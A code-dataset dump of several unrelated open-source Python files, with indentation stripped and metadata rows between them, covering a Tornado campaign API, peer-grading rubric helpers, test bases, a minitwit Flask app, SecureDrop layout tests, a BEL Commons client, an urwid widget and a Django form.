def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Methods", "GET, POST, DELETE, PUT, OPTIONS")
self.set_header('Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept')
def options(self, *args):
self.post(*args)
def get(self, *args):
self.post(*args)
#self.write("not implemented yet")
#@drenaj_simple_auth
@tornado.web.asynchronous
@gen.coroutine
def post(self, *args, **keywords):
# Refactoring note: the new drenaj database manager is now a class and it's initialized
# in Tornado application. The old code just imported the manager module as 'drenajmongomanager'/
# Instead of search&replace procedure, assign the new db instance to drenajmongomanager.
drenajmongomanager = self.application.db
print args
action = args[0]
print action
print args
verbose_response = self.get_argument('verbose', '')
if (action == 'new'):
try:
campaign_id = self.get_argument('campaign_id')
description = self.get_argument('description', '')
campaign_type = self.get_argument('campaign_type', '') # timeline, streaming or both.
query_terms = self.get_argument('query_terms', '')
user_id_strs_to_follow = self.get_argument('user_id_strs_to_follow', '')
user_screen_names_to_follow = self.get_argument('user_screen_names_to_follow', '')
try:
drenajmongomanager.create_campaign(
{
'campaign_id': campaign_id,
'description': description,
'campaign_type': campaign_type,
'query_terms': query_terms,
'user_id_strs_to_follow': user_id_strs_to_follow,
'user_screen_names_to_follow': user_screen_names_to_follow,
})
result = 'success'
except OperationFailure:
result = 'failure'
self.write({'status': result})
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
# TODO: implement logging.
raise HTTPError(500, 'You didn''t supply %s as an argument' % e.arg_name)
elif (action == 'view'):
try:
campaign_id = self.get_argument('campaign_id', 'default')
subcommand = args[1]
if subcommand == None:
cursor = drenajmongomanager.get_campaign(campaign_id)
campaign = yield cursor
if campaign:
self.write(bson.json_util.dumps(campaign))
else:
self.write(bson.json_util.dumps({}))
self.add_header('Content-Type', 'application/json')
if subcommand == "watched_users":
skip = self.get_argument('skip', 0)
limit = self.get_argument('limit', 100)
attached_users_array = drenajneo4jmanager.get_users_attached_to_campaign(campaign_id, skip, limit)
attached_users_response = {'watched_users': [], 'campaign_id': campaign_id}
for item in attached_users_array:
x = dict()
y = dict()
for rel in item[1]:
if rel.type == 'TIMELINE_TASK_STATE':
x = dict(rel.properties)
elif rel.type == 'FRIENDFOLLOWER_TASK_STATE':
y = dict(rel.properties)
attached_users_response['watched_users'] += [[item[0], x, y]]
self.write(bson.json_util.dumps(attached_users_response))
self.add_header('Content-Type', 'application/json')
elif subcommand == "freqs":
cursor = drenajmongomanager.get_campaign_with_freqs(campaign_id)
cursor = yield cursor
campaign = cursor['result']
if campaign:
self.write(bson.json_util.dumps(campaign))
else:
self.write(bson.json_util.dumps({}))
self.add_header('Content-Type', 'application/json')
elif subcommand == 'histograms':
re_calculate = self.get_argument('re_calculate', 'no')
n_bins = self.get_argument('n_bins', "100")
if re_calculate == 'no':
cursor = drenajmongomanager.get_campaign_histograms(campaign_id)
hists = yield cursor
if hists.count() == 0:
re_calculate = 'yes'
if re_calculate == 'yes':
results = drenajmongomanager.get_users_related_with_campaign(campaign_id)
tmp = yield results[0]
users = tmp['result']
# How many tweets?
tmp = yield results[1]
n_tweets = tmp.count()
hist = drenajmongomanager.prepare_hist_and_plot(n_tweets, users, n_bins, campaign_id)
hists = [hist]
yield self.application.db.motor_column.histograms.insert(hist)
self.write(bson.json_util.dumps(hists[0]))
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
# TODO: implement logging.
raise HTTPError(500, 'You didn''t supply %s as an argument' % e.arg_name)
elif (action == 'edit'):
try:
campaign_id = self.get_argument('campaign_id')
subcommand = args[1]
if subcommand == 'add_watched_users':
new_watched_users = self.get_argument('new_watched_users','')
drenajmongomanager.add_to_watchlist(campaign_id, new_watched_users)
self.write(bson.json_util.dumps({'result': 'successful'}))
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
raise HTTPError(500, 'You didn''t supply %s as an argument' % e.arg_name)
elif (action == 'list'):
try:
cursor = drenajmongomanager.get_campaigns_list()
campaigns = yield cursor.to_list(length=None)
self.write(bson.json_util.dumps(campaigns))
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
# TODO: implement logging.
raise HTTPError(500, 'You didn''t supply %s as an argument' % e.arg_name)
elif (action == 'filter'):
try:
skip = int(self.get_argument('skip', 0))
limit = int(self.get_argument('limit', 10))
print("FILTER: ", "skip: ", skip, ", limit", limit)
cursor = drenajmongomanager.get_campaign_list_with_freqs(skip, limit)
print("END FILTER: ", "skip: ", skip, ", limit", limit)
cursor = yield cursor
campaigns = cursor['result']
print("GCLWF: EXCEPTION: ", "campaigns: ", campaigns)
self.write(bson.json_util.dumps(campaigns))
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
# TODO: implement logging.
raise HTTPError(500, 'You didn''t supply %s as an argument' % e.arg_name)
else:
self.write('not recognized')
| mit | -2,630,529,231,603,231,000 | 46.269841 | 123 | 0.527871 | false |
scott-s-douglas/SWAPR | SWAPRrubric.py | 1 | 10154 | from SWAPRsqlite import *
from itertools import groupby
def createRubricsTable(db):
db.cursor.execute("CREATE TABLE IF NOT EXISTS rubrics (labNumber int, itemIndex int, itemType text, itemValues text, graded boolean, itemPrompt text)")
def addRubricItem(db, labNumber, itemIndex, itemType, itemValues, graded, itemPrompt = None):
db.cursor.execute("INSERT INTO rubrics VALUES (NULL, ?, ?, ?, ?, ?)", [labNumber, itemIndex, itemType, itemPrompt, graded])
if itemValues == []:
db.cursor.execute("INSERT INTO responseKeys VALUES (NULL,?,?,?,?)",[labNumber,itemIndex,0,None])
for i in range(len(itemValues)):
db.cursor.execute("INSERT INTO responseKeys VALUES (NULL, ?,?,?,?)",[labNumber, itemIndex,i,float(itemValues[-(i+1)])])
db.conn.commit()
def getMaxScore(db,labNumber):
# assumes max score corresponds with response 0
db.cursor.execute("SELECT score FROM responseKeys, rubrics WHERE response = 0 AND responseKeys.labNumber = ? AND responseKeys.itemIndex = rubrics.itemIndex AND responseKeys.labNumber = rubrics.labNumber AND graded",[labNumber])
maxScoreVector = [float(entry[0]) for entry in db.cursor.fetchall()]
maxScore = sum(maxScoreVector)
return maxScore, maxScoreVector
def getNgradedItems(db,labNumber,likert5only=False):
"Return the number of graded items in a particular lab's rubric. This function makes a SQLite call, so don't run it between a select and a fetch on that same database."
if not likert5only:
db.cursor.execute('''SELECT count(*)
FROM rubrics
WHERE
labNumber = ?
AND graded
''',[labNumber])
else:
db.cursor.execute('''SELECT count(*)
FROM rubrics
WHERE
labNumber = ?
AND graded
AND itemType = 'likert5'
''',[labNumber])
Ngraded = int(db.cursor.fetchone()[0])
return Ngraded
def getScoresDict(db,labNumber):
# Construct a dictionary of dictionaries where each possible response is paired with its score for GRADED items only
db.cursor.execute('''SELECT k.itemIndex, k.response, k.score
FROM responseKeys k, rubrics r
WHERE
--match labNumber
r.labNumber = ?
AND r.labNumber = k.labNumber
--match itemIndex
AND r.itemIndex = k.itemIndex
AND k.score IS NOT NULL
AND r.graded
ORDER BY k.itemIndex, k.response, k.score''',[labNumber])
data = [[int(entry[0]),int(entry[1]),float(entry[2])] for entry in db.cursor.fetchall()]
scoresDict = {}
for itemIndex, itemIndexGroup in groupby(data, lambda entry: entry[0]):
thisScores = {}
for pair in itemIndexGroup:
thisScores.update({pair[1]:pair[2]})
scoresDict.update({itemIndex:thisScores})
return scoresDict
def addDefaultRubric(db, labNumber):
# Make sure the Wnumbers are actually consecutive on WebAssign!
if labNumber == 3:
addRubricItem(db, labNumber, 1, 'likert5', [0,2,6,10,12], True, 'The video presentation is clean and easy to follow.')
addRubricItem(db, labNumber, 2, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the video presentation?')
addRubricItem(db, labNumber, 3, 'yhn', [0,6,12], True, 'Does the video introduce the problem and state the main result?')
addRubricItem(db, labNumber, 4, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the introduction and the statements of the main result?')
addRubricItem(db, labNumber, 5, 'yhn', [0,6,12], True, 'Does the video identify the model(s) relevant to this physical system?')
addRubricItem(db, labNumber, 6, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the discussion of how the main physics ideas are applied in the problem under study?')
addRubricItem(db, labNumber, 7, 'yhn', [0,1,2], True, 'The computational model(s) successfully predict(s) the mass of the black hole.')
addRubricItem(db, labNumber, 8, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve how well his/her computational model(s) predicted the mass of the black hole?')
addRubricItem(db, labNumber, 9, 'likert5', [0,2,6,10,12], True, 'The presenter successfully discusses how his/her computational model(s) predicts or fails to predict the mass of the black hole.')
addRubricItem(db, labNumber, 10, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her EXPLANATION of how his/her model predicted the mass of the black hole?')
addRubricItem(db, labNumber, 11, 'likert5', [0,2,6,10,12], True, 'The video presentation correctly explains the physics.')
addRubricItem(db, labNumber, 12, 'freeResponse', [], False, 'Were there any aspects of the physics in this video which the presenter did not make clear? Was the presenter mistaken about some of the physics he or she presented?')
addRubricItem(db, labNumber, 13, 'comparative5', [-2,-1,0,1,2], False, 'How does this video compare to your own video?')
addRubricItem(db, labNumber, 14, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her report, or what are a couple of things you have learned from this video to improve your own report?')
if labNumber == 6:
addRubricItem(db, labNumber, 1, 'likert5', [0,2,6,10,12], True, 'The video presentation is clear and easy to follow.')
addRubricItem(db, labNumber, 2, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the video presentation?')
addRubricItem(db, labNumber, 3, 'yhn', [0,6,12], True, 'Does the presenter identify the lecture they attended and introduce the topic of that lecture?')
addRubricItem(db, labNumber, 4, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the introduction and the problem statement? ')
addRubricItem(db, labNumber, 5, 'yhn', [0,1,2], True, 'Does the presenter summarize the main points of the lecture and state why this topic was of interest to him or her?')
addRubricItem(db, labNumber, 6, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the summary of the main points of the lecture? ')
addRubricItem(db, labNumber, 7, 'likert5', [0,2,6,10,12], True, 'TThe presenter taught the viewer something interesting they learned as a result of attending this lecture.')
addRubricItem(db, labNumber, 8, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the summary of the main points of the lecture? ')
addRubricItem(db, labNumber, 9, 'likert5', [0,2,6,10,12], True, 'The presenter followed up on the lecture with ideas or concepts not discussed by the public speaker.')
addRubricItem(db, labNumber, 10, 'freeResponse', [], False, 'Were there any aspects of the physics in this video which the presenter did not make clear? Was the presenter mistaken about some of the physics he or she presented? ')
addRubricItem(db, labNumber, 11, 'comparative5', [-2,-1,0,1,2], False, 'How does this video compare to your own video?')
addRubricItem(db, labNumber, 12, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her report, or what are a couple of things you have learned from this video to improve your own report?')
else:
addRubricItem(db, labNumber, 1, 'likert5', [0,2,6,10,12], True, 'The video presentation is clean and easy to follow.')
addRubricItem(db, labNumber, 2, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the video presentation?')
addRubricItem(db, labNumber, 3, 'yhn', [0,6,12], True, 'Does the video introduce the problem and state the main result?')
addRubricItem(db, labNumber, 4, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the introduction and the statements of the main result?')
addRubricItem(db, labNumber, 5, 'yhn', [0,6,12], True, 'Does the video identify the model(s) relevant to this physical system?')
addRubricItem(db, labNumber, 6, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the discussion of how the main physics ideas are applied in the problem under study?')
addRubricItem(db, labNumber, 7, 'likert5', [0,0.5,1,1.5,2], True, 'The computational model(s) successfully predict(s) the motion of the object observed.')
addRubricItem(db, labNumber, 8, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve how well his/her computational model(s) predicted the motion of the object?')
addRubricItem(db, labNumber, 9, 'likert5', [0,2,6,10,12], True, 'The presenter successfully discusses how his/her computational model(s) predicts or fails to predict the motion of the object.')
addRubricItem(db, labNumber, 10, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her EXPLANATION of how his/her model predicted the motion of the object?')
addRubricItem(db, labNumber, 11, 'likert5', [0,2,6,10,12], True, 'The video presentation correctly explains the physics.')
addRubricItem(db, labNumber, 12, 'freeResponse', [], False, 'Were there any aspects of the physics in this video which the presenter did not make clear? Was the presenter mistaken about some of the physics he or she presented?')
addRubricItem(db, labNumber, 13, 'comparative5', [-2,-1,0,1,2], False, 'How does this video compare to your own video?')
addRubricItem(db, labNumber, 14, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her report, or what are a couple of things you have learned from this video to improve your own report?')
| gpl-2.0 | -4,788,761,156,601,311,000 | 85.786325 | 241 | 0.697065 | false |
griddynamics/nova-billing | tests/__init__.py | 1 | 1989 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Nova Billing
# Copyright (C) GridDynamics Openstack Core Team, GridDynamics
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Base class for Nova Billing unit tests.
"""
import unittest
import stubout
import json
import os
class TestCase(unittest.TestCase):
def setUp(self):
"""Run before each test method to initialize test environment."""
super(TestCase, self).setUp()
self.stubs = stubout.StubOutForTesting()
def tearDown(self):
"""Runs after each test method to tear down test environment."""
self.stubs.UnsetAll()
self.stubs.SmartUnsetAll()
@staticmethod
def json_load_from_file(filename):
with open(os.path.join(os.path.dirname(
os.path.abspath(__file__)), filename),
"rt") as json_file:
return json.load(json_file)
#Set it to True for json out files regeneration
write_json = False
def json_check_with_file(self, data, filename):
if self.write_json:
with open(os.path.join(os.path.dirname(
os.path.abspath(__file__)), filename),
"wt") as json_file:
json.dump(data, json_file, indent=4)
else:
self.assertEqual(data,
self.json_load_from_file(filename))
| gpl-3.0 | 3,098,607,152,673,971,000 | 32.728814 | 74 | 0.646053 | false |
science09/minitwi | app/minitwi.py | 1 | 6408 | #-*- coding:utf-8 -*-
import time
from hashlib import md5
from datetime import datetime
from flask import Flask, request, session, url_for, redirect, \
render_template, abort, g, flash
from werkzeug.security import check_password_hash, generate_password_hash
from models import *
PER_PAGE = 10
app = Flask(__name__)
app.config['SECRET_KEY'] = 'development key'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///tuimimi.db'
app.debug = True
app.config.from_object(__name__)
app.config.from_envvar('MINITWIT_SETTINGS', silent=True)
def get_user_id(username):
"""Convenience method to look up the id for a username."""
rv = User.query.filter_by(username=username).first_or_404()
return rv.user_id if rv else None
def format_datetime(timestamp):
"""Format a timestamp for display."""
return datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d @ %H:%M')
def gravatar_url(email, size=80):
"""Return the gravatar image for the given email address."""
return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \
(md5(email.strip().lower().encode('utf-8')).hexdigest(), size)
@app.before_request
def before_request():
g.user = None
if 'user_id' in session:
g.user = User.query.filter_by(user_id=session['user_id']).first_or_404()
else:
app.logger.warning('user_id not in session')
@app.route('/')
def timeline():
"""Shows a users timeline or if no user is logged in it will
redirect to the public timeline. This timeline shows the user's
messages as well as all the messages of followed users.
"""
if not g.user:
return redirect(url_for('public_timeline'))
message = Message.query.filter_by(author_id=session['user_id']).order_by('pub_date desc').limit(PER_PAGE)
return render_template('timeline.html', messages=message)
@app.route('/public')
def public_timeline():
"""Displays the latest messages of all users."""
message = Message.query.order_by('pub_date desc').limit(PER_PAGE)
return render_template('timeline.html', messages=message)
@app.route('/<username>')
def user_timeline(username):
"""Display's a users tweets."""
profile_user = User.query.filter_by(username=username).first_or_404()
print profile_user
if profile_user is None:
abort(404)
followed = False
if g.user:
followed = Follower.query.filter_by(who_id=session['user_id'],whom_id=profile_user.user_id).first() is not None
message = Message.query.filter_by(author_id=profile_user.user_id).order_by('pub_date desc').limit(PER_PAGE)
return render_template('timeline.html', messages=message,profile_user=profile_user,followed=followed)
@app.route('/<username>/follow')
def follow_user(username):
"""Adds the current user as follower of the given user."""
if not g.user:
abort(401)
whom_id = get_user_id(username)
if whom_id is None:
abort(404)
follower = Follower(session['user_id'], whom_id)
db.session.add(follower)
db.session.commit()
flash('You are now following "%s"' % username)
return redirect(url_for('user_timeline', username=username))
@app.route('/<username>/unfollow')
def unfollow_user(username):
"""Removes the current user as follower of the given user."""
if not g.user:
abort(401)
whom_id = get_user_id(username)
if whom_id is None:
abort(404)
follower = Follower.query.filter_by(who_id=session['user_id'], whom_id=whom_id).first()
db.session.delete(follower)
db.session.commit()
flash('You are no longer following "%s"' % username)
return redirect(url_for('user_timeline', username=username))
@app.route('/add_message', methods=['POST'])
def add_message():
"""Registers a new message for the user."""
if 'user_id' not in session:
abort(401)
if request.form['text']:
message = Message(session['user_id'], request.form['text'], int(time.time()))
db.session.add(message)
db.session.commit()
flash('Your message was recorded')
return redirect(url_for('timeline'))
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Logs the user in."""
if g.user:
return redirect(url_for('timeline'))
error = None
if request.method == 'POST':
user = User.query.filter_by(username=request.form['username']).first_or_404()
if user is None:
error = 'Invalid username'
elif not check_password_hash( user.pw_hash, request.form['password']):
error = 'Invalid password'
else:
flash('You were logged in')
session['user_id'] = user.user_id
return redirect(url_for('timeline'))
return render_template('login.html', error=error)
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Registers the user."""
if g.user:
return redirect(url_for('timeline'))
error = None
if request.method == 'POST':
if not request.form['username']:
error = 'You have to enter a username'
elif not request.form['email'] or \
'@' not in request.form['email']:
error = 'You have to enter a valid email address'
elif not request.form['password']:
error = 'You have to enter a password'
elif request.form['password'] != request.form['password2']:
error = 'The two passwords do not match'
elif User.query.filter_by(username=request.form['username']).first() is not None:
error = 'The username is already taken'
else:
user = User(request.form['username'], request.form['email'],
generate_password_hash(request.form['password']))
print request.form['username'], request.form['email']
db.session.add(user)
db.session.commit()
flash('You were successfully registered and can login now')
return redirect(url_for('login'))
return render_template('register.html', error=error)
@app.route('/logout')
def logout():
"""Logs the user out."""
flash('You were logged out')
session.pop('user_id', None)
return redirect(url_for('public_timeline'))
# add some filters to jinja
app.jinja_env.filters['datetimeformat'] = format_datetime
app.jinja_env.filters['gravatar'] = gravatar_url
if __name__ == '__main__':
db.create_all()
app.run()
| mit | 8,190,148,019,333,539,000 | 36.255814 | 119 | 0.644351 | false |
garrettr/securedrop | securedrop/tests/pages-layout/test_source.py | 1 | 6151 | #
# SecureDrop whistleblower submission system
# Copyright (C) 2017 Loic Dachary <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from tests.functional import journalist_navigation_steps
from tests.functional import source_navigation_steps
import functional_test
import pytest
@pytest.mark.pagelayout
class TestSourceLayout(
functional_test.FunctionalTest,
source_navigation_steps.SourceNavigationStepsMixin,
journalist_navigation_steps.JournalistNavigationStepsMixin):
def test_index(self):
self._source_visits_source_homepage()
self._screenshot('source-index.png')
def test_index_javascript(self):
self._javascript_toggle()
self._source_visits_source_homepage()
self._screenshot('source-index_javascript.png')
def test_lookup(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._screenshot('source-lookup.png')
def test_lookup_shows_codename(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_shows_codename()
self._screenshot('source-lookup-shows-codename.png')
def test_login(self):
self._source_visits_source_homepage()
self._source_chooses_to_login()
self._screenshot('source-login.png')
def test_enters_text_in_login_form(self):
self._source_visits_source_homepage()
self._source_chooses_to_login()
self._source_enters_codename_in_login_form()
self._screenshot('source-enter-codename-in-login.png')
def test_use_tor_browser(self):
self._source_visits_use_tor()
self._screenshot('source-use_tor_browser.png')
def test_generate(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._screenshot('source-generate.png')
def test_logout_flashed_message(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._source_logs_out()
self._screenshot('source-logout_flashed_message.png')
def test_submission_entered_text(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_enters_text_in_message_field()
self._screenshot('source-submission_entered_text.png')
def test_next_submission_flashed_message(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._source_submits_a_message()
self._screenshot('source-next_submission_flashed_message.png')
def test_source_checks_for_reply(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._source_logs_out()
self._journalist_logs_in()
self._journalist_checks_messages()
self._journalist_downloads_message()
self._journalist_sends_reply_to_source()
self._source_visits_source_homepage()
self._source_chooses_to_login()
self._source_proceeds_to_login()
self._screenshot('source-checks_for_reply.png')
self._source_deletes_a_journalist_reply()
self._screenshot('source-deletes_reply.png')
def test_source_flagged(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._source_logs_out()
self._journalist_logs_in()
self._source_delete_key()
self._journalist_visits_col()
self._journalist_flags_source()
self._source_visits_source_homepage()
self._source_chooses_to_login()
self._source_proceeds_to_login()
self._screenshot('source-flagged.png')
def test_notfound(self):
self._source_not_found()
self._screenshot('source-notfound.png')
def test_tor2web_warning(self):
self._source_tor2web_warning()
self._screenshot('source-tor2web_warning.png')
def test_why_journalist_key(self):
self._source_why_journalist_key()
self._screenshot('source-why_journalist_key.png')
@pytest.mark.pagelayout
class TestSourceSessionLayout(
functional_test.FunctionalTest,
source_navigation_steps.SourceNavigationStepsMixin,
journalist_navigation_steps.JournalistNavigationStepsMixin):
def setup(self):
self.session_length_minutes = 0.03
super(TestSourceSessionLayout, self).setup(
session_expiration=self.session_length_minutes)
def test_source_session_timeout(self):
self._source_visits_source_homepage()
self._source_clicks_submit_documents_on_homepage()
self._source_continues_to_submit_page()
self._source_waits_for_session_to_timeout(self.session_length_minutes)
self._source_enters_text_in_message_field()
self._source_visits_source_homepage()
self._screenshot('source-session_timeout.png')
| agpl-3.0 | -5,079,552,309,221,852,000 | 37.685535 | 78 | 0.678101 | false |
pybel/pybel | src/pybel/io/bel_commons_client.py | 1 | 3998 | # -*- coding: utf-8 -*-
"""Transport functions for `BEL Commons <https://github.com/bel-commons/bel-commons>`_.
BEL Commons is a free, open-source platform for hosting BEL content. Because it was originally
developed and published in an academic capacity at Fraunhofer SCAI, a public instance can be
found at https://bel-commons-dev.scai.fraunhofer.de. However, this instance is only supported
out of posterity and will not be updated. If you would like to host your own instance of
BEL Commons, there are instructions on its GitHub page.
"""
import logging
from typing import Optional
import pystow
import requests
from .nodelink import from_nodelink, to_nodelink
from ..struct.graph import BELGraph
from ..version import get_version
__all__ = [
'to_bel_commons',
'from_bel_commons',
]
logger = logging.getLogger(__name__)
RECIEVE_ENDPOINT = '/api/receive/'
GET_ENDPOINT = '/api/network/{}/export/nodelink'
def _get_host() -> Optional[str]:
"""Find the host with :func:`pystow.get_config`.
Has two possibilities:
1. The PyBEL config entry ``PYBEL_REMOTE_HOST``, loaded in :mod:`pybel.constants`
2. The environment variable ``PYBEL_REMOTE_HOST``
"""
return pystow.get_config('pybel', 'remote_host')
def _get_user() -> Optional[str]:
return pystow.get_config('pybel', 'remote_user')
def _get_password() -> Optional[str]:
return pystow.get_config('pybel', 'remote_password')
def to_bel_commons(
graph: BELGraph,
host: Optional[str] = None,
user: Optional[str] = None,
password: Optional[str] = None,
public: bool = True,
) -> requests.Response:
"""Send a graph to the receiver service and returns the :mod:`requests` response object.
:param graph: A BEL graph
:param host: The location of the BEL Commons server. Alternatively, looks up in PyBEL config with
``PYBEL_REMOTE_HOST`` or the environment as ``PYBEL_REMOTE_HOST``.
:param user: Username for BEL Commons. Alternatively, looks up in PyBEL config with
``PYBEL_REMOTE_USER`` or the environment as ``PYBEL_REMOTE_USER``
:param password: Password for BEL Commons. Alternatively, looks up in PyBEL config with
``PYBEL_REMOTE_PASSWORD`` or the environment as ``PYBEL_REMOTE_PASSWORD``
:param public: Should the network be made public?
:return: The response object from :mod:`requests`
"""
if host is None:
host = _get_host()
logger.debug('using host: %s', host)
if user is None:
user = _get_user()
if user is None:
raise ValueError('no user found')
if password is None:
password = _get_password()
if password is None:
raise ValueError('no password found')
url = host.rstrip('/') + RECIEVE_ENDPOINT
response = requests.post(
url,
json=to_nodelink(graph),
headers={
'content-type': 'application/json',
'User-Agent': 'PyBEL v{}'.format(get_version()),
'bel-commons-public': 'true' if public else 'false',
},
auth=(user, password),
)
logger.debug('received response: %s', response)
return response
def from_bel_commons(network_id: int, host: Optional[str] = None) -> BELGraph:
"""Retrieve a public network from BEL Commons.
In the future, this function may be extended to support authentication.
:param network_id: The BEL Commons network identifier
:param host: The location of the BEL Commons server. Alternatively, looks up in PyBEL config with
``PYBEL_REMOTE_HOST`` or the environment as ``PYBEL_REMOTE_HOST``.
:raises: ValueError if host configuration can not be found
"""
if host is None:
host = _get_host()
if host is None:
raise ValueError('host not specified in arguments, PyBEL configuration, or environment.')
url = host + GET_ENDPOINT.format(network_id)
res = requests.get(url)
graph_json = res.json()
graph = from_nodelink(graph_json)
return graph
| mit | -2,507,534,870,051,758,600 | 31.504065 | 101 | 0.670585 | false |
SebastianSchildt/potatonet-power | gui/epod.py | 1 | 2803 | import urwid
from yesno import ConfirmButton
class ElectricityPodlet(object):
def __init__(self, name, nr):
self.name=name
self.nr=nr
self.PWRstate='off'
self.ETHstate='unknown'
self.buildGui()
def buildGui(self):
txt=urwid.Text(('nodehead', self.name), align='center')
#headline=urwid.Filler(txt,"middle")
headline=urwid.Padding(txt,align="center")
headline=urwid.AttrMap(headline,'nodehead')
self.eth=urwid.Text('Eth Link: '+str(self.ETHstate),align='left', wrap="clip")
if self.PWRstate=='on':
#self.btn=urwid.Button("Switch PWR Off")
self.btn=ConfirmButton("Switch PWR Off", self.PWRPress)
self.pwr=urwid.Text( ('nodeON' ,'Power: '+str(self.PWRstate)), align='left')
else:
#self.btn=urwid.Button("Switch PWR On")
self.btn=ConfirmButton("Switch PWR On", self.PWRPress)
self.pwr=urwid.Text( ('nodeOFF' ,'Power: '+str(self.PWRstate)), align='left')
#urwid.connect_signal(self.btn, 'click', self.PWRPress, self.name)
#self.btnHolder=urwid.AttrMap(self.btn, 'btn', focus_map='reversed')
self.btnHolder=self.btn
#p=urwid.Pile([ urwid.BoxAdapter(headline,1), ('pack',self.pwr), ('pack',eth), ('pack',self.btnHolder) ])
p=urwid.Pile([ headline, ('pack',self.pwr), ('pack',self.eth), ('pack',self.btnHolder) ])
self.ui=urwid.LineBox(p)
def updatePowerState(self,state):
if state == True or state==1 or int(state) == 1:
self.PWRstate="on"
self.btn.set_label("Switch PWR Off")
self.pwr.set_text( ('nodeON','Power: '+str(self.PWRstate)))
else:
self.PWRstate='off'
self.btn.set_label("Switch PWR On")
self.pwr.set_text( ('nodeOFF','Power: '+str(self.PWRstate)))
def updateEthernetState(self,state):
if int(state) == 0:
self.ETHstate="disabled"
#self.btn.set_label("Switch PWR Off")
self.eth.set_text( ('nodeOFF','Eth Link: '+str(self.ETHstate)))
elif int(state) == 1:
self.ETHstate="enabled, no link"
#self.btn.set_label("Switch PWR Off")
self.eth.set_text( ('nodeOFF','Eth Link: '+str(self.ETHstate)))
elif int(state) == 2:
self.ETHstate="UNKNOWN"
#self.btn.set_label("Switch PWR Off")
self.eth.set_text( ('nodeOFF','Eth Link: '+str(self.ETHstate)))
elif int(state) == 3:
self.ETHstate="enabled, link active"
#self.btn.set_label("Switch PWR Off")
self.eth.set_text( ('nodeON','Eth Link: '+str(self.ETHstate)))
else:
self.ETHstate='UNKNOWN'
#self.btn.set_label("Switch PWR On")
self.eth.set_text( ('nodeOFF','Eth Link: '+str(self.ETHstate)))
def PWRPress(self):
if self.PWRstate == 'off':
self.PWRstate='on'
self.btn.set_label("Switch PWR Off")
self.pwr.set_text( ('nodeON','Power: '+str(self.PWRstate)))
else:
self.PWRstate='off'
self.btn.set_label("Switch PWR On")
self.pwr.set_text( ('nodeOFF','Power: '+str(self.PWRstate)))
| mit | -2,659,397,285,443,749,000 | 30.144444 | 107 | 0.663932 | false |
zeta709/django-coffee-capsules | coffee_capsules/forms.py | 1 | 2874 | from django import forms
from django.contrib.admin import widgets
#from django.forms.extras import SelectDateWidget
from coffee_capsules.models import Purchase, PurchaseItem, Request
from coffee_capsules.widgets import SelectedReadonly
class PurchaseForm(forms.ModelForm):
class Meta:
model = Purchase
# References about AdminSplitDateTime():
# http://stackoverflow.com/questions/15643019/
def __init__(self, *args, **kwargs):
super(PurchaseForm, self).__init__(*args, **kwargs)
self.fields['begin_date'].widget = widgets.AdminSplitDateTime()
self.fields['end_date'].widget = widgets.AdminSplitDateTime()
class PurchaseItemForm(forms.ModelForm):
#default_price = forms.CharField()
class Meta:
model = PurchaseItem
widgets = {
'capsule': SelectedReadonly(),
}
def __init__(self, *args, **kwargs):
